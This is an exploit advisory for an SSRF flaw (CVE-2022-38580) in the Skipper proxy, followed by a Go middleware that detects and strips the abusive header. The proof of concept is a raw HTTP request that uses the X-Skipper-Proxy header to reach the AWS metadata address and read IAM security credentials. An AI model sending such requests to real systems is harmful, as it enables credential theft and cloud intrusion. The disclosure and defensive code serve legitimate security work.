X-Skipper-Proxy v0.13.237 – Server Side Request Forgery (SSRF)

  • Author: Hosein Vita
    Date: 2023-03-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51111/
  • #Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
    #Date: 24/10/2022
    #Exploit Author: Hosein Vita & Milad Fadavvi
    #Vendor Homepage: https://github.com/zalando/skipper
    #Software Link: https://github.com/zalando/skipper
    #Version: < v0.13.237
    #Tested on: Linux
    #CVE: CVE-2022-38580
    
    
    Summary:
    
    Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of the proxy to access the internal metadata server or other unauthenticated URLs by adding a specific header (X-Skipper-Proxy) to the HTTP request.
    
    
    Proof Of Concept:
    
    1- Add the header "X-Skipper-Proxy" to your request
    2- Add the AWS metadata path to the request path
    
    GET /latest/meta-data/iam/security-credentials HTTP/1.1
    Host: yourskipperdomain.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    X-Skipper-Proxy: http://169.254.169.254
    Connection: close
    
    
    
    
    Reference:
    https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
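A defensive illustration of the request above, added here and not taken from the advisory or from Skipper's code: a Go handler wrapper, assumed to sit in front of the proxy, that reports and removes any client-supplied X-Skipper-Proxy header before the request is forwarded. The names `classify` and `StripProxyHeader`, the class labels, and the sample request are constructed for this example.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// proxyHeader is the request header named in the advisory above.
const proxyHeader = "X-Skipper-Proxy"

// classify labels a client-supplied proxy target so alerts can be prioritised (labels are hypothetical).
func classify(target string) string {
	u, err := url.Parse(target)
	if err != nil || u.Hostname() == "" {
		return "invalid"
	}
	ip := net.ParseIP(u.Hostname())
	switch {
	case ip == nil:
		return "hostname" // a name; not resolved here
	case ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() || ip.IsUnspecified():
		return "internal-ip" // e.g. 169.254.169.254 (link-local metadata address)
	}
	return "public-ip"
}

// StripProxyHeader reports every X-Skipper-Proxy value and deletes the header before next runs.
func StripProxyHeader(next http.Handler, report func(remote, target, class string)) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		for _, v := range r.Header.Values(proxyHeader) {
			report(r.RemoteAddr, v, classify(v))
		}
		r.Header.Del(proxyHeader)
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Constructed request with the same path and header as the proof of concept.
	req := httptest.NewRequest("GET", "/latest/meta-data/iam/security-credentials", nil)
	req.Header.Set(proxyHeader, "http://169.254.169.254")
	up := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { fmt.Printf("upstream sees %q\n", r.Header.Get(proxyHeader)) })
	alert := func(remote, target, class string) { fmt.Printf("ALERT %s sent %s (%s)\n", remote, target, class) }
	StripProxyHeader(up, alert).ServeHTTP(httptest.NewRecorder(), req)
}
```

The same header name can be used as a search term in access logs that record request headers, to find requests of this shape after the fact.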